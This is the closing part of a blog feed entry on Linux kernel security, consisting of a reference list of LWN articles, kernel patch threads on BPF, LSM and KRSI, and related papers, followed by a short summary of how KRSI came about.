<p>[17] “LWN: Enabling Non-Executable Memfds.” https://lwn.net/Articles/918106/</p>

<p>[18] “LWN: Impedance Matching for BPF and LSM,” Feb. 26, 2020. https://lwn.net/Articles/813261/</p>

<p>[19] “LWN: Kernel Runtime Security Instrumentation.” https://lwn.net/Articles/798157/</p>

<p>[20] “LWN: KRSI — The Other BPF Security Module,” Dec. 27, 2019. https://lwn.net/Articles/808048/</p>

<p>[21] “LWN: KRSI and Proprietary BPF Programs,” Jan. 17, 2020. https://lwn.net/Articles/809841/</p>

<p>[22] “Mitigating Attacks on a Supercomputer With KRSI.”</p>

<p>[23] “[PATCH bpf-next 0/4] Reduce overhead of LSMs with static calls.” [Online]. Available: https://lore.kernel.org/bpf/202301201137.93A66D1C76@keescook/T/#ma6a93c345ad38764bef97c18c982c11ab1cf0c0f</p>

<p>[24] “[PATCH v4 bpf-next 00/20] Introduce BPF trampoline.” [Online]. Available: https://lore.kernel.org/bpf/20191114185720.1641606-1-ast@kernel.org/#t</p>

<p>[25] “[RFC] security: replace indirect calls with static calls.” [Online]. Available: https://lore.kernel.org/bpf/20200820164753.3256899-1-jackmanb@chromium.org/</p>

<p>[26] “Static Calls in Linux 5.10.” https://blog.yossarian.net/2020/12/16/Static-calls-in-Linux-5-10</p>

<p>[27] “The Design and Implementation of Userland Exec”, [Online]. Available: https://grugq.github.io/docs/ul_exec.txt</p>

<p>[28] “Volatility3.” [Online]. Available: https://github.com/volatilityfoundation/volatility3</p>]]></content><author><name></name></author><summary type="html"><![CDATA[Back in 2001, the Linux Security Module (LSM) subsystem made its way into the mainline kernel. Almost 10 years ago, in September 2014, the modern BPF virtual machine (VM) landed in the tree. In late 2019, KP Singh proposed a patchset that facilitates the creation of modules for the former that run on the latter - Kernel Runtime Security Instrumentation (KRSI) was born.]]></summary></entry></feed>